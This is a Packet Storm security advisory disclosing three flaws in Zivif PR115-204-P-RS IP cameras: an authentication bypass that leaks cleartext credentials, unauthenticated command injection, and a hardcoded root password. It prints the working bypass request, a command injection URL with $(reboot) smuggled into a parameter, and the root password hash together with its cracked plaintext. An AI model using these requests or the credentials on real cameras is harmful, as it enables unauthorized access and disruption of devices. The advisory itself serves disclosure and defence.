what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Zivif PR115-204-P-RS 2.3.4.2103 Bypass / Command Injection / Hardcoded Password

Zivif PR115-204-P-RS 2.3.4.2103 Bypass / Command Injection / Hardcoded Password
Posted Dec 13, 2017
Authored by Silas Cutler

Zivif PR115-204-P-RS cameras version 2.3.4.2103 suffer from authentication bypass, command injection, and hardcoded password vulnerabilities.

tags | exploit, vulnerability, bypass
advisories | CVE-2017-17105, CVE-2017-17106, CVE-2017-17107
SHA-256 | d6311c41776954bc22d5925d870d532e5e567534bfc1de6779abd9900066bc86

Zivif PR115-204-P-RS 2.3.4.2103 Bypass / Command Injection / Hardcoded Password

Change Mirror Download
Attack vector: Remote
Authentication: None
Researcher: Silas Cutler `p1nk` <silas.cutler@blacklistthisdomain.com>
Release date: December 10, 2017
Full Disclosure: 90 days
CVEs: CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107
Vulnerable Device: Zivif PR115-204-P-RS
Version: V2.3.4.2103


Timeline:
1 September 2017: Initial alerting to Zivif
1 September 2017: Zivif contact established.
3 September 2017: Details provided.
7 September 2017: Confirmation of vulnerabilities from Zivif
5 December 2017: Public note on Social Media CVE-2017-17105,
CVE-2017-17106, and CVE-2017-17107 would be included in HackerStrip comic.
10 December 2017: This email


-[Overview]-
Implementation of access controls is Zivif cameras is severely lacking.
As a result, CGI functions can be called directly, bypassing
authentication checks.

This was first identified with the following request (CVE-2017-17106)
http://<Camera Address>/web/cgi-bin/hi3510/param.cgi?cmd=getuser
Cameras respond to this with:

var name0="admin"; var password0="admin"; var authLevel0="255"; var
name1="guest"; var password1="guest"; var authLevel1="3"; var
name2="admin2"; var password2="admin"; var authLevel2="3"; var name3="";
var password3=""; var authLevel3="3"; var name4=""; var password4="";
var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3";
var name6=""; var password6=""; var authLevel6="3"; var name7=""; var
password7=""; var authLevel7="3"; var name8=""; var password8=""; var
authLevel8="0"; var name9=""; var password9=""; var authLevel9="0
Credentials are returned in cleartext to the requester.

In exploring, unauthenticated remote command injection is possible using
(CVE-2017-17105)
http://<Camera
IP>/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time="1504225666237"&-url=$(reboot)

Command results are not returned, however are executed by the system.

One last findings was the /etc/passwd file contains the following
hard-coded entry (CVE-2017-17107):
root:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh

The encrypted password is cat1029.

(none) login: root
Password:
Login incorrect
(none) login: root
Password:
Welcome to SONIX.
\u@\h:\W$
Because of the way the file system is structured, changing this password
requires more work then running passwd.

-[Note]-
The hi3510 is shared with a couple other cameras I'm exploring. The
motd saying /Welcome to SONIX/ has lead me to speculate parts of this
firmware may be shared with other cameras.



-Silas



Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    111 Files
  • 24
    May 24th
    27 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close